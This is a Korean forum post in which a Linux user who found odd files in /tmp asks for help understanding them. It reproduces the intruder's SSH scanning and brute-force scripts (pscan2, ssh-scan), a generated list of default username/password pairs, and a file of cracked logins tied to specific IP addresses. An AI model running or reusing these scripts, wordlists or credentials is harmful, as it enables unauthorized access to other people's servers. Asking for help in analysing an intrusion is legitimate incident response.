리눅스 9.0 /tmp 안에 이상파일이 있어서 해킹당한것 같은데 2번째

리눅스 9.0 /tmp 안에 이상파일이 있어서 해킹당한것 같은데 2번째

아래 글적은 내용이 정보가 많이 부족한것 같아서
덧붙어서 글을 올립니다.
아래 적은 글내용안에 /temp/team2 안의
내용입니다
스크립트 내용은 쬐금 이해는 되지만 이걸로 도대체 뭘할려고 했는지...
아무튼 도움을 바랍니다..
좋은 하루 되세요

#!/bin/bash
if [ $# != 1 ]; then
        echo " usage: $0 <b class>"
        exit;
fi

echo "### SSH22 Scanner By YupY-BoG & GodZilla TEAM !  ###"
echo "## Sa Ne Bagam Pula in Cipy & Prietenii Acestuia ##"
echo "# Hai Fratioare ca I-am Dat Drumu Tine pumnii :) #"
./pscan2 $1 22

sleep 10
cat $1.pscan.22 |sort |uniq > mfu.txt
oopsnr2=`grep -c . mfu.txt`
echo "# Iaa.. Iaa.!! "
echo "# Doar  $oopsnr2 de servere.. AHH.. Bagami-as PULA in CIPY"
echo "----------------------------------------"
echo "# Yepaa.. Acu e Acu fratioare GodZilla or YupY-BoG"
./ssh-scan 100
rm -rf $1.pscan.22 mfu.txt
echo "Lasa Tata Poate Data Viitoare"

#!/bin/bash

users=$1;
pass=$2;

./ss 22 -b $1 -i eth0 -s 6
cat bios.txt |sort | uniq > mfu.txt
./ssh-scan
rm -f bios.txt
if [ ! -f "$users" -o ! -f "$pass" ] ; then
                                echo "File not found";
                                exit;
fi

rm -f pass_file
for m_user in $(cat $users) ; do
                                for m_pass in $(cat $pass) ; do
                                                                echo "$m_user $m_pass" >>pass_file
                                done
done

./ss 22 -b $1 -i eth0 -s 6
cat bios.txt |sort | uniq > mfu.txt
./ssh-scan
rm -f bios.txt

 vvln.txt  안의 내용
alex:alex:68.157.113.201
DUP admin:password:68.157.192.56
DUP admin:123456:68.157.192.56
DUP admin:12345:68.157.192.56
DUP admin:administrator:68.157.192.56
DUP admin:root:68.157.192.56
DUP admin:admin123:68.157.192.56
admin:admin:68.157.192.56

pass_file 안의 내용
root root
admin admin
test test
guest guest
webmaster webmaster
mysql mysql
oracle oracle
library library
info info
shell shell
linux linux
unix unix
webadmin webadmin
ftp ftp
test test123
root root123
admin admin123
guest guest123
master master
apache apache
root webadmin
root admin
root shell
root linux
root test
root webmaster
root mysql
admin root
admin administrator
admin 123456
root 123456
root 12345678
test test12345
test 123456
webmaster 123456
user user
username username
username password
user password
root password
admin password
test password
root master
root apache
root unix
root redhat
danny danny
sharon sharon
aron aron
alex alex
brett brett
mike mike
alan alan
data data
www-data www-data
http http
httpd httpd
nobody nobody